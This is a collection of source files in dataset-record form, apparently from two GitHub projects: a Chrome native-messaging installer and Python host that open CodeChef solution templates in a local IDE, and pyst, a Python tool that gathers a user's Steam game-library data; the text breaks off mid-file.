\"Enter the IDE for Java :\"\nread javaide\nif hash $javaide > /dev/null 2>&1;\nthen\n\techo \"$javaide was found on your system !! Successfully Configured ...........\"\n\tch=0\nelse\n\techo \"No software named $javaide was not found on your system !!\"\nfi\ndone\n\nloop=1\nwhile [ $loop -eq 1 ]\ndo\n\techo \"Enter the path to the solution-folder (It will be created if doesn't exist) : \"\n\tread sol_path\n\n\tif [[ -z $sol_path ]]\n\tthen\n\t\techo \"No Input Found !! Try Again\"\n\telif [ -f $sol_path ]\n\tthen\n\t\techo \"The Path Specified is a regular file!! Please enter path to a directory !!\"\n\telse\n\t\tmkdir -p $sol_path\n\t\tret=$?\n\t\tif [ $ret -ne 0 ]\n\t\tthen\n\t\t\techo \"Error in detecting/creating Directory !!\"\n\t\telif [ -w $sol_path ]\n\t\tthen\n\t\t\tloop=0\n\t\telse\n\t\t\techo \"The diectory should have write permission !!\"\n\t\tfi\n\tfi\ndone\n\n#Creating Required Directories\n\nmkdir -p $HOME/.code-now > /dev/null 2>&1\nrm $HOME/.code-now/* > /dev/null 2>&1\n\n# Creating the Json Manifest File\npath_dir=$HOME\nif [ $ischrome -eq 1 ]\nthen\n\tjson_file=\"$HOME/.config/google-chrome/NativeMessagingHosts/codenow.json\"\n\tif [ -f $json_file ]\n\tthen\n\t\trm $json_file\n\tfi\n\tinst_dir=\"$HOME/.config/google-chrome/NativeMessagingHosts\"\n\tif [ ! -d $inst_dir ]\n\tthen\n\t\tmkdir -p $inst_dir\n\tfi\n\t(cat codenow.json | sed -e \"s:PATH_TO_REQ_PROG:$path_dir/.code-now/prog.py:g\") > $HOME/.config/google-chrome/NativeMessagingHosts/codenow.json\nfi\n\nif [ $ischromium -eq 1 ]\nthen\n\tjson_file=\"$HOME/.config/chromium/NativeMessagingHosts/codenow.json\"\n\tif [ -f $json_file ]\n\tthen\n\t\trm $json_file\n\tfi\n\tinst_dir=\"$HOME/.config/chromium/NativeMessagingHosts\"\n\tif [ ! -d $inst_dir ]\n\tthen\n\t\tmkdir -p $inst_dir\n\tfi\n\t(cat codenow.json | sed -e \"s:PATH_TO_REQ_PROG:$path_dir/.code-now/prog.py:g\") > $HOME/.config/chromium/NativeMessagingHosts/codenow.json\nfi\n\necho \"JSON file created ..........................\"\n\n# Creating the prog.py script\ncp prog.py $path_dir/.code-now/prog.py\nsed \"s:DEFAULT_SOLUTION_PATH:$sol_path:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nsed \"s:JAVA_IDE:$javaide:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nsed \"s:CPP_IDE:$cppide:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nsed \"s:C_IDE:$cide:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nchmod +x $path_dir/.code-now/prog.py\necho \"Python Script Created ......................\"\n\n# Copying the template files\ncp c_template.c $path_dir/.code-now/\ncp cpp_template.cpp $path_dir/.code-now/\ncp java_template.java $path_dir/.code-now/\necho \"Templates Copied............................\"\n\necho \"Installation Successful !! Please Install the extension\"\n" }, { "alpha_fraction": 0.5784105658531189, "alphanum_fraction": 0.5864853262901306, "avg_line_length": 31.23287582397461, "blob_id": "db49de62e7e3450c983483091074b6ef1e3ca124", "content_id": "86861b5a2ee15d3d8a40809c26ed509f707cda8c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2353, "license_type": "permissive", "max_line_length": 127, "num_lines": 73, "path": "/host-program/prog.py", "repo_name": "arjbholu/code-now-CodeChef", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# May God Bless Us All\n\nimport struct\nimport sys\nimport subprocess\nimport string\nimport re\nimport os\n\n# Helper function that sends a message to the chrome-plugin.\ndef send_message(message):\n sys.stdout.write(struct.pack('I', len(message)))\n sys.stdout.write(message)\n sys.stdout.flush()\n\n# Functiom that reads messages from the chrome-plugin\ndef read_func():\n while 1:\n text_length_bytes = sys.stdin.read(4)\n if len(text_length_bytes) == 0:\n sys.exit(0)\n\n text_length = struct.unpack('i', text_length_bytes)[0]\n\n text = sys.stdin.read(text_length).decode('utf-8')\n\n text = string.replace(text,\"problem_name\",\"\")\n text = string.replace(text,\"problem_url\",\"\")\n text = string.replace(text,\"user_name\",\"\")\n text = string.replace(text,\"lang\",\"\")\n text = string.replace(text,\"\\\"\\\":\\\"\",\"\")\n text = string.replace(text,\"{\",\"\")\n text = string.replace(text,\"}\",\"\")\n text = string.replace(text,\"\\\"\",\"\")\n info = string.split(text,\",\")\n\n info[0] = re.sub('[ ]+', ' ', info[0])\n filename = re.sub(' ', '_', info[0])\n filename = \"DEFAULT_SOLUTION_PATH\" + os.sep + filename + \".\" + info[3]\n\n if not os.path.isfile(filename) :\n file_content = \"/*\\n\\tProblem Name = \" + info[0] + \"\\n\\tProblem Link = \" + info[1] + \"\\n\\tUser = \" + info[2] + \"\\n*/\\n\"\n with open(os.path.join(os.path.dirname(__file__),info[3] + \"_template.\" + info[3]), \"r\") as myfile:\n file_content = file_content + myfile.read()\n fp = open(filename, \"w\")\n fp.write(file_content)\n fp.close()\n \n if info[3] == \"java\" :\n try:\n exit_code = subprocess.check_output(['JAVA_IDE', filename])\n except subprocess.CalledProcessError, e:\n send_message('{\"text\": \"Bad Settings. Please Reinstall !!\"}')\n\n elif info[3] == \"cpp\" :\n try:\n exit_code = subprocess.check_output(['CPP_IDE', filename])\n except subprocess.CalledProcessError, e:\n send_message('{\"text\": \"Bad Settings. Please Reinstall !!\"}')\n\n elif info[3] == \"c\" :\n try:\n exit_code = subprocess.check_output(['C_IDE', filename])\n except subprocess.CalledProcessError, e:\n send_message('{\"text\": \"Bad Settings. Please Reinstall !!\"}')\n\ndef Main():\n read_func()\n sys.exit(0)\nif __name__ == '__main__':\n Main()\n" } ]
2
shrewdlogarithm/pyst
https://github.com/shrewdlogarithm/pyst
0d4ab98b04addf0932d427aee2d42bb82190caea
a42b66c255c134c2402f49184a05bd45242a838d
bda85e5ce0392df7c02642b4d929013289b871db
refs/heads/master
2016-08-09T07:24:58.602963
2016-01-26T10:14:26
2016-01-26T10:14:26
44,608,427
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6638115644454956, "alphanum_fraction": 0.6680942177772522, "avg_line_length": 23.526315689086914, "blob_id": "ac0c37bcf234d40f5ccaf733db9b53341220ba02", "content_id": "0ff4569539c943c1b2f266b6ad3f309f3c3d428c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 113, "num_lines": 19, "path": "/loader/api.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import urllib2\nimport json\n\ndef getapi(logindata, gamedata, apidb):\n\tappids = \"\"\n\tfor appid in gamedata:\n\t\tif appids:\n\t\t\tappids += \",\"\n\t\tappids += appid\n\ttry:\n\t\tusock = urllib2.urlopen('http://steamtrayapi-steamtray.rhcloud.com/getappids?appids=' + appids + '&extra=true')\n\t\tapidata = json.load(usock)\n\t\tfor appid in apidata:\n\t\t\tapidb[appid] = {}\n\t\t\tfor k in apidata[appid]:\n\t\t\t\tapidb[appid][\"data-api-\"+k] = apidata[appid][k]\n\texcept:\n\t\tpass\n\t\t# api likely offline\n\n" }, { "alpha_fraction": 0.5430512428283691, "alphanum_fraction": 0.5472737550735474, "avg_line_length": 29.261110305786133, "blob_id": "1849f3809bda459271f0e49796a8a3c45b44778f", "content_id": "8530627add3f1662d02a73fafe1236f63e3816b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5447, "license_type": "no_license", "max_line_length": 95, "num_lines": 180, "path": "/utils/vdf/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "\"\"\"\nModule for deserializing/serializing to and from VDF\n\"\"\"\n__version__ = \"1.10\"\n__author__ = \"Rossen Georgiev\"\n\nimport re\nimport sys\nfrom io import StringIO as unicodeIO\n\n# Py2 & Py3 compability\nif sys.version_info[0] >= 3:\n string_type = str\n BOMS = '\\ufffe\\ufeff'\n\n def bomlen(line):\n return len(line) - len(line.lstrip(BOMS))\nelse:\n from cStringIO import StringIO as strIO\n string_type = basestring\n BOMS = '\\xef\\xbb\\xbf\\xff\\xfe\\xfe\\xff'\n BOMS_UNICODE = '\\\\ufffe\\\\ufeff'.decode('unicode-escape')\n\n def bomlen(line):\n return len(line) - len(line.lstrip(BOMS if isinstance(line, str) else BOMS_UNICODE))\n\n\ndef parse(source, mapper=dict):\n \"\"\"\n Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a VDF)\n to a Python object.\n\n ``mapper`` specifies the Python object used after deserializetion. ``dict` is\n used by default. Alternatively, ``collections.OrderedDict`` can be used if you\n wish to preserve key order. Or any object that acts like a ``dict``.\n \"\"\"\n if not issubclass(mapper, dict):\n raise TypeError(\"Expected mapper to be subclass of dict, got %s\", type(mapper))\n if hasattr(source, 'read'):\n fp = source\n elif isinstance(source, string_type):\n try:\n fp = unicodeIO(source)\n except TypeError:\n fp = strIO(source)\n else:\n raise TypeError(\"Expected source to be str or file-like object\")\n\n # skip past BOMs\n fp.seek(bomlen(fp.read(10)))\n\n # init\n stack = [mapper()]\n expect_bracket = False\n\n re_keyvalue = re.compile(r'^(\"(?P<qkey>(?:\\\\.|[^\\\\\"])+)\"|(?P<key>[a-z0-9\\-\\_]+))'\n r'([ \\t]*('\n r'\"(?P<qval>(?:\\\\.|[^\\\\\"])*)(?P<vq_end>\")?'\n r'|(?P<val>[a-z0-9\\-\\_]+)'\n r'))?',\n flags=re.I\n )\n\n for line in fp:\n line = line.lstrip()\n\n # skip empty and comment lines\n if line == \"\" or line[0] == '/':\n continue\n\n # one level deeper\n if line[0] == \"{\":\n expect_bracket = False\n continue\n\n if expect_bracket:\n raise SyntaxError(\"vdf.parse: expected openning bracket\")\n\n # one level back\n if line[0] == \"}\":\n if len(stack) > 1:\n stack.pop()\n continue\n\n raise SyntaxError(\"vdf.parse: one too many closing parenthasis\")\n\n # parse keyvalue pairs\n while True:\n match = re_keyvalue.match(line)\n\n if not match:\n raise SyntaxError(\"vdf.parse: invalid syntax\")\n\n key = match.group('key') if match.group('qkey') is None else match.group('qkey')\n val = match.group('val') if match.group('qval') is None else match.group('qval')\n\n # we have a key with value in parenthesis, so we make a new dict obj (level deeper)\n if val is None:\n stack[-1][key] = mapper()\n stack.append(stack[-1][key])\n expect_bracket = True\n\n # we've matched a simple keyvalue pair, map it to the last dict obj in the stack\n else:\n # if the value is line consume one more line and try to match again,\n # until we get the KeyValue pair\n if match.group('vq_end') is None and match.group('qval') is not None:\n line += next(fp)\n continue\n\n stack[-1][key] = val\n\n # exit the loop\n break\n\n if len(stack) != 1:\n raise SyntaxError(\"vdf.parse: unclosed parenthasis or quotes\")\n\n return stack.pop()\n\n\ndef loads(fp, **kwargs):\n \"\"\"\n Deserialize ``fp`` (a ``.read()``-supporting file-like object containing\n a VDF) to a Python object.\n \"\"\"\n assert isinstance(fp, string_type), \"Expected a str\"\n return parse(fp, **kwargs)\n\n\ndef load(fp, **kwargs):\n \"\"\"\n Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a VDF)\n to a Python object.\n \"\"\"\n assert hasattr(fp, 'read'), \"Expected fp to have readlines() method\"\n return parse(fp, **kwargs)\n\n\ndef dumps(data, pretty=False):\n \"\"\"\n Serialize ``obj`` to VDF formatted ``str``.\n \"\"\"\n if not isinstance(data, dict):\n raise TypeError(\"Expected data to be an instance of``dict``\")\n if not isinstance(pretty, bool):\n raise TypeError(\"Expected pretty to be bool\")\n\n return ''.join(_dump_gen(data, pretty))\n\n\ndef dump(data, fp, pretty=False):\n \"\"\"\n Serialize ``obj`` as a VDF formatted stream to ``fp`` (a\n ``.write()``-supporting file-like object).\n \"\"\"\n if not isinstance(data, dict):\n raise TypeError(\"Expected data to be an instance of``dict``\")\n if not hasattr(fp, 'write'):\n raise TypeError(\"Expected fp to have write() method\")\n\n for chunk in _dump_gen(data, pretty):\n fp.write(chunk)\n\n\ndef _dump_gen(data, pretty=False, level=0):\n indent = \"\\t\"\n line_indent = \"\"\n\n if pretty:\n line_indent = indent * level\n\n for key, value in data.items():\n if isinstance(value, dict):\n yield '%s\"%s\"\\n%s{\\n' % (line_indent, key, line_indent)\n for chunk in _dump_gen(value, pretty, level+1):\n yield chunk\n yield \"%s}\\n\" % line_indent\n else:\n yield '%s\"%s\" \"%s\"\\n' % (line_indent, key, value)\n" }, { "alpha_fraction": 0.6198257207870483, "alphanum_fraction": 0.6503267884254456, "avg_line_length": 27.6875, "blob_id": "a59f3c2c52a59fa778af5e8a325c7a62df0234f0", "content_id": "4b0123bd84c32eb6880f019a76ed0c7218a35651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 918, "license_type": "no_license", "max_line_length": 114, "num_lines": 32, "path": "/loader/finduser.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\n\nimport utils\nfrom utils import vdf\n\n\ndef getuserconfig(steamhome):\n\n\tlatestuser = None\n\tlatesttime = 0\n\ttry:\n\t\tloginusers = vdf.load(open(os.path.join(steamhome[\"path\"],\"config\",\"loginusers.vdf\")))\n\t\tif \"users\" in loginusers:\n\t\t\tfor loginuser in loginusers[\"users\"]:\n\t\t\t\tsteamy = int(loginuser) - 76561197960265728\n\t\t\t\tsteamx = steamy % 2\n\t\t\t\tsteamy = (steamy-steamx)/2\n\t\t\t\t# steam2 = \"STEAM:_0:\" + str(steamx) + \":\" + str(steamy)\n\t\t\t\t# steam3 = \"U:1:\" + str(steamy*2+steamx)\n\t\t\t\tif \"Timestamp\" in loginusers[\"users\"][loginuser] and loginusers[\"users\"][loginuser][\"Timestamp\"] > latesttime:\n\t\t\t\t\tlatestuser = {\n\t\t\t\t\t\t\"id64\": loginuser,\n\t\t\t\t\t\t\"name\": loginusers[\"users\"][loginuser][\"PersonaName\"],\n\t\t\t\t\t \"account\": loginusers[\"users\"][loginuser][\"AccountName\"],\n\t\t\t\t\t \"dir\": str(steamy*2+steamx)\n\t\t\t\t\t}\n\t\t\t\t\tlatesttime = loginusers[\"users\"][loginuser][\"Timestamp\"]\n\n\texcept:\n\t\tpass\n\n\treturn latestuser\n" }, { "alpha_fraction": 0.6370997428894043, "alphanum_fraction": 0.6440927386283875, "avg_line_length": 22.230770111083984, "blob_id": "a3f8e8a3d078109a32d8e939c4634c89ef51b5e7", "content_id": "b694f5ac970afaeee3976d7a40c0837c952f485e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2717, "license_type": "no_license", "max_line_length": 109, "num_lines": 117, "path": "/utils/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import re\nimport time\nimport operator\nfrom threading import Thread\n\n# Steam stuff\nsteamapps = [\"steamapps\",\"SteamApps\"]\n\ndef getprofileurl(logindata):\n\tprofileurl = \"http://steamcommunity.com\"\n\tif \"id64\" in logindata:\n\t\tprofileurl += \"/profiles/\" + logindata[\"id64\"]\n\telse:\n\t\tprofileurl += \"/id/\" + logindata[\"name\"]\n\treturn profileurl\n\n# thread stuff\nclass RunAsync(Thread):\n\tdef __init__(self, event, action,delay):\n\t\tThread.__init__(self)\n\t\tself.stopped = event\n\t\tself.delay = delay\n\t\tself.action = action\n\n\tdef run(self):\n\t\twhile not self.stopped and self.delay:\n\t\t\tself.action()\n\t\t\ttime.sleep(self.delay)\n\n# utility functions\ndef merge(a, b, path=None):\n\t\"merges b into a\"\n\tif path is None: path = []\n\tfor key in b:\n\t\tif key in a:\n\t\t\tif isinstance(a[key], dict) and isinstance(b[key], dict):\n\t\t\t\tmerge(a[key], b[key], path + [str(key)])\n\t\t\telif not isinstance(a[key], unicode) and not isinstance(b[key], unicode): # don't try if either is unicode\n\t\t\t\tif a[key] < b[key]:\n\t\t\t\t\ta[key] = b[key]\n\t\telse:\n\t\t\ta[key] = b[key]\n\treturn a\n\ndef zerowidthsplit(pattern, string):\n\tsplits = list(m.start() for m in re.finditer(pattern, string))\n\tstarts = [0] + splits\n\tends = splits + [len(string)]\n\treturn [string[start:end] for start, end in zip(starts, ends)]\n\n\ndef getnum(ust):\n\tst = ust.rstrip(\"\\0\")\n\tpo = 0\n\tnu = 0\n\tfor s in reversed(st):\n\t\tnu *= 256\n\t\tnu += ord(s)\n\treturn str(nu)\n\ndef stripquotes(val):\n\treturn val.replace(\"'\",\"\").replace('\"','')\n\ndef jsontocsv(gamelist):\n\tdef adddata(addto,val):\n\t\tif addto:\n\t\t\taddto += '\",\"'\n\t\telse:\n\t\t\taddto += '\"'\n\t\tif isinstance(val,dict):\n\t\t\tpass\n\t\telif isinstance(val,int) or isinstance(val,long) or isinstance(val,float):\n\t\t\taddto += str(val)\n\t\telse:\n\t\t\tval = stripquotes(val)\n\t\t\taddto += val\n\t\treturn addto\n\tgamelistexpdicts = {}\n\tfor g in gamelist:\n\t\tgamelistexpdicts[g] = {}\n\t\tfor c in gamelist[g]:\n\t\t\tif isinstance(gamelist[g][c],dict):\n\t\t\t\tfor cd in gamelist[g][c]:\n\t\t\t\t\tgamelistexpdicts[g][c+\"-\"+cd] = gamelist[g][c][cd]\n\t\t\telse:\n\t\t\t\tgamelistexpdicts[g][c] = gamelist[g][c]\n\tcols = {}\n\tfor g in gamelistexpdicts:\n\t\tfor c in gamelistexpdicts[g]:\n\t\t\tif c not in cols:\n\t\t\t\tcols[c] = 0\n\t\t\tcols[c] = cols[c] + 1\n\tcolssort = sorted(cols.items(), key=operator.itemgetter(1))\n\tcolssort.reverse()\n\tcsv = []\n\tlabels = u\"\"\n\tfor c in colssort:\n\t\tlabels = adddata(labels,c[0])\n\tcsv.append((labels + '\"').encode(\"UTF-8\"))\n\tfor g in gamelistexpdicts:\n\t\tvals = u\"\"\n\t\tfor c in colssort:\n\t\t\tif c[0] in gamelistexpdicts[g]:\n\t\t\t\tvals = adddata(vals,gamelistexpdicts[g][c[0]])\n\t\t\telse:\n\t\t\t\tvals = adddata(vals,u\"\")\n\t\tcsv.append((vals + '\"').encode(\"UTF-8\"))\n\treturn csv\n\n# debug/error message handling\ndebug = True\ndef debuglog(v):\n\tif debug:\n\t\tprint v\n\telse:\n\t\tpass\n\t\t# todo write to file?" }, { "alpha_fraction": 0.6732869744300842, "alphanum_fraction": 0.6792452931404114, "avg_line_length": 41, "blob_id": "42df44aa4a9e22e4f65d5108a2eb222064467ea7", "content_id": "28d4517afb6c4c46026257fb4cc6edf6be504cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1007, "license_type": "no_license", "max_line_length": 96, "num_lines": 24, "path": "/loader/purchased.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import re\nimport datetime\nimport time\nimport os\n\ndef getpurchased(logindata):\n\tpurchaseinfo = {}\n\tusearch = re.compile(\"Logging in user '([^']+)' to Steam Public\")\n\tpsplit = re.compile(\"([0-9]+):[\\s\\S]+?Purchased : (.*) in\")\n\tfor root, subFolders, files in os.walk(\"..\"): # todo cheating as this is above 'web' but messy?\n\t\tfor file in files:\n\t\t\tif file.lower().endswith(\".lic\"):\n\t\t\t\tlicensefile = open(os.path.join(root,file))\n\t\t\t\tlicensedata = licensefile.read().decode(\"UTF-8\")\n\t\t\t\tusername = usearch.search(licensedata).group(1)\n\t\t\t\tif username == logindata[\"account\"]:\n\t\t\t\t\tfor license in licensedata.split(\"License packageID\"):\n\t\t\t\t\t\tpurchasedata = psplit.search(license)\n\t\t\t\t\t\tif purchasedata is not None:\n\t\t\t\t\t\t\tpurchasetime = datetime.datetime.strptime(purchasedata.group(2),\"%a %b %d %H:%M:%S %Y\")\n\t\t\t\t\t\t\tpurchaseinfo[purchasedata.group(1)] = time.mktime(purchasetime.timetuple())\n\t\t\t\tlicensefile.close()\n\t\t\t\tos.rename(os.path.join(root,file),os.path.join(root,file + \".old\"))\n\treturn purchaseinfo" }, { "alpha_fraction": 0.6298600435256958, "alphanum_fraction": 0.643856942653656, "avg_line_length": 24.760000228881836, "blob_id": "e572be4812c7e7768083c587d01300fe712ad616", "content_id": "9a9275f123a7c9bef2fa530e3de32fdcee1da802", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 84, "num_lines": 25, "path": "/loader/steamhome.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport platform\n\ndef getpath():\n\tplat = platform.system().lower()\n\tplatarch = \"32\"\n\tif 'PROGRAMFILES(X86)' in os.environ:\n\t\tplatarch = \"64\"\n\tsteamhome = {\"platform\": plat, \"platarch\": platarch}\n\tif plat == \"windows\":\n\t\timport _winreg\n\t\tregkey = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,\"Software\\\\Valve\\\\Steam\")\n\t\ttry:\n\t\t\ti = 0\n\t\t\twhile 1:\n\t\t\t\tname, value, type = _winreg.EnumValue(regkey, i)\n\t\t\t\tif name == \"SteamPath\":\n\t\t\t\t\tsteamhome[\"path\"] = value\n\t\t\t\t\tbreak;\n\t\t\t\ti += 1\n\t\texcept WindowsError:\n\t\t\tprint\n\telif plat == \"linux\":\n\t\tsteamhome[\"path\"] = os.path.join(os.path.expanduser('~'),\".local\",\"share\",\"Steam\")\n\treturn steamhome" }, { "alpha_fraction": 0.6579275727272034, "alphanum_fraction": 0.6604244709014893, "avg_line_length": 19.049999237060547, "blob_id": "2c1b26d28ef7e651ea7dfa77d12900189a33c88c", "content_id": "cc08d611b0baa86266e4660a30beda57bd1b497d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "no_license", "max_line_length": 52, "num_lines": 40, "path": "/data/optionsdb.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport time\n\nclass OptionsDB():\n\toptions = {}\n\tsavefile = os.path.join(os.getcwd(),'options.json')\n\tdef __init__(self):\n\t\ttry:\n\t\t\toptionsdbfile = open(self.savefile, 'rb')\n\t\t\tself.options = json.load(optionsdbfile)\n\t\t\tself.save()\n\t\texcept:\n\t\t\tpass\n\n\tdef get(self,opt=None):\n\t\tif opt is None:\n\t\t\treturn self.options\n\t\telif opt in self.options:\n\t\t\treturn self.options[opt]\n\t\telse:\n\t\t\treturn None\n\n\tdef set(self,opt,val):\n\t\tif opt is not None and val is not None:\n\t\t\tself.options[opt] = val\n\t\t\tself.save()\n\n\tdef checkdue(self,name, delay):\n\t\tnow = time.time()\n\t\tif now - (self.get(name) or 0) > delay:\n\t\t\tself.set(name, now)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef save(self):\n\t\toutfile = open(self.savefile, 'wb')\n\t\tjson.dump(self.options, outfile, indent=4)\n\t\toutfile.close()" }, { "alpha_fraction": 0.6119673848152161, "alphanum_fraction": 0.6273798942565918, "avg_line_length": 39.88888931274414, "blob_id": "cf567b0b6dbeafad6219b870c38c5b6d408cecea", "content_id": "aa336a33151ceecec2ae4842e00664cfc22e637b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1103, "license_type": "no_license", "max_line_length": 148, "num_lines": 27, "path": "/loader/reviews.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import re\nimport urllib2\nfrom utils.BeautifulSoup import BeautifulSoup as bs\nimport utils\n\ndef getreviews(logindata, gamedata,page=1):\n\tif page == 1:\n\t\tfor game in gamedata:\n\t\t\tif \"review\" in gamedata[game]:\n\t\t\t\tdel gamedata[game][\"reviewed\"]\n\ttry:\n\t\tappinfofile = urllib2.urlopen(utils.getprofileurl(logindata) + \"/recommended/?p=\" + str(page))\n\t\tdoc = bs(appinfofile)\n\t\tfor el in doc.findAll(\"div\", {\"class\": \"review_box\"}):\n\t\t\t# header = el.find(\"div\", {\"class\": \"header\"})\n\t\t\t# try:\n\t\t\t# \tprint re.search(r'([0-9]+) of ([0-9]+) people \\(([0-9]+)%',header.text).groups()\n\t\t\t# except:\n\t\t\tappid = re.search(r'\\d+',el.find(\"div\",{\"class\":\"leftcol\"}).find(\"a\")[\"href\"]).group()\n\t\t\treview = re.search(r'(?<=thumbs).*(?=\\.)',el.find(\"div\",{\"class\":\"rightcol\"}).find(\"div\",{\"class\":\"thumb\"}).find(\"a\").find(\"img\")[\"src\"]).group()\n\t\t\tgamedata[appid][\"reviewed\"] = review.lower()\n\t\tpaging = doc.find(\"div\", {\"class\": \"workshopBrowsePagingInfo\"})\n\t\trevpos = re.search(r'([0-9]+) of ([0-9]+)',paging.text)\n\t\tif revpos.groups()[0] != revpos.groups()[1]:\n\t\t\tgetreviews(logindata, gamedata, page+1)\n\texcept:\n\t\tpass" }, { "alpha_fraction": 0.675159215927124, "alphanum_fraction": 0.6772823929786682, "avg_line_length": 25.22222137451172, "blob_id": "cc5873e74cfd97f7fcb09ada97acb925085a5c5e", "content_id": "871b696163fbaf5ba0c9900c19872708d74a7dd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 51, "num_lines": 18, "path": "/data/gamedb.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import json\nimport os\nclass GameDB():\n\tgamedb = {}\n\tsavefile = os.path.join(os.getcwd(),'gamedb.json')\n\tdef load(self,logindata):\n\t\ttry:\n\t\t\tgamedbfile = open(self.savefile, 'rb')\n\t\t\tself.gamedb = json.load(gamedbfile)\n\t\texcept:\n\t\t\tpass\n\t\tif logindata[\"dir\"] not in self.gamedb:\n\t\t\tself.gamedb[logindata[\"dir\"]] = {}\n\t\treturn self.gamedb[logindata[\"dir\"]]\n\tdef save(self):\n\t\toutfile = open(self.savefile, 'wb')\n\t\tjson.dump(self.gamedb, outfile, indent=4)\n\t\toutfile.close()" }, { "alpha_fraction": 0.7607437968254089, "alphanum_fraction": 0.7665289044380188, "avg_line_length": 56.619049072265625, "blob_id": "5422b0ff3727dfb7138b0addc9ac139268eba82b", "content_id": "b4011f7e4877b9e3aa284e24dd637f89357f78a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2420, "license_type": "no_license", "max_line_length": 308, "num_lines": 42, "path": "/README.md", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "# pyst\npyst is a desktop app (written in Python) which offers users of Valve's Steam gaming client access to detailed data about the games they own.\n\n\n## In detail?\n\npyst extracts data from a variety of sources (local Steam Install, public profile, Steam Reviews and Steam Store) and consolidates it into a single database.\n\nAt present it makes that database available as a JSON data-feed and as a (rough and ready) CSV file.\n\nIt also ships with some example HTML applications which use the JSON data-feed - but my hope is people will create their own applications - and even integrate other applications like RainMeter or whatever else they like!\n\n## What does pyst stand-for?\nMy earlier attempts at creating a tool like this (using Node/Javascript) were called 'SteamTray' (because they lived in a desktop tray icon and offered a Tray Menu)\n\nI converted my code to Python to reduce memory/cpu usage, gain speed and sPYthon Steam Tray became pyst!!\n\n\n## How to Use pyst\n\nOn Linux (and OSX if someone would like to help me test it!) you simply download the source-code and run `python pyst.py`\n \nOn Windows things are more complex because Python is not usually available. \nFirst-up you'll need to install Python 2 (NOT 3) from https://www.python.org/downloads/release/python-2710/ \nOur source-code includes a file (pyst.bat) which will run pyst once that's installed\nNote: pyst.bat assumes that Python is installed as default (c:\\python27) so if you install it elsewhere, edit pyst.bat to reflect that!!\n\n\n## How to setup pyst or access the JSON data-feed, CSV file and examples\n\nOnce pyst is running, you can access the pyst built-in webserver at http://localhost:55555 That page shows which user it's read the game collection for (the last one logged-into Steam) as well as some info. about that user's game collection, links for the JSON and CSV and a few example HTML applications.\n\n\n## Why isn't there a simple app to download - why is it source-code??\n\nIt's early days for pyst - I can (and probably will) create a standalone application you can download, but for testing/debugging it's easier (and more secure) using source-code at this point.\n\nIf nothing else, more people can see all my mistakes and help me add stuff and make the whole thing more 'Pythonic' perhaps ;0\n\n\n## I have a problem\nThere's the bare-bones of a Wiki [starting here](../../wiki) - or head-over to the issues button to the right!!\n" }, { "alpha_fraction": 0.6856745481491089, "alphanum_fraction": 0.6968011260032654, "avg_line_length": 27.799999237060547, "blob_id": "b319184584827021add7568a99f76e179c81ccc9", "content_id": "f5d42e973aa96cdf59f8eda7a37601825956f9df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 82, "num_lines": 25, "path": "/loader/onlineprofile.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import urllib2\nimport xml.etree.ElementTree as ET\nimport utils\n\ndef getprofile(logindata,gamedata):\n\tdef getval(xmlval, default):\n\t\tif xmlval is not None:\n\t\t\treturn xmlval.text\n\t\telse:\n\t\t\treturn default\n\tusock = urllib2.urlopen(utils.getprofileurl(logindata) + \"/games/?tab=all&xml=1\")\n\ttry:\n\t\txmldoc = ET.parse(usock)\n\t\troot = xmldoc.getroot()\n\t\tfor game in root.find(\"games\").findall(\"game\"):\n\t\t\tappid = game.find(\"appID\").text\n\t\t\tif appid in gamedata:\n\t\t\t\thrs = getval(game.find(\"hoursOnRecord\"), None)\n\t\t\t\tif hrs is not 